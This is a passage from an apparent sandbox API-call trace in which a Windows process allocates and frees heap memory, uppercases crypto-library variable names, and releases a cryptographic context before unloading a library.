hHeap=0x970000) returned 1 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.670] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.670] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.670] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519e8 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0268.671] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.672] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.672] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0268.672] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.672] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.673] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0268.673] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.673] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.675] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.676] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.676] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0268.677] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.677] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.677] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.677] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.677] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0268.678] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.678] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.678] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.678] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.678] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.678] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0268.678] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0268.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0268.679] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0268.681] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.681] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.681] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.682] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.682] FreeLibrary (hLibModule=0x756e0000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 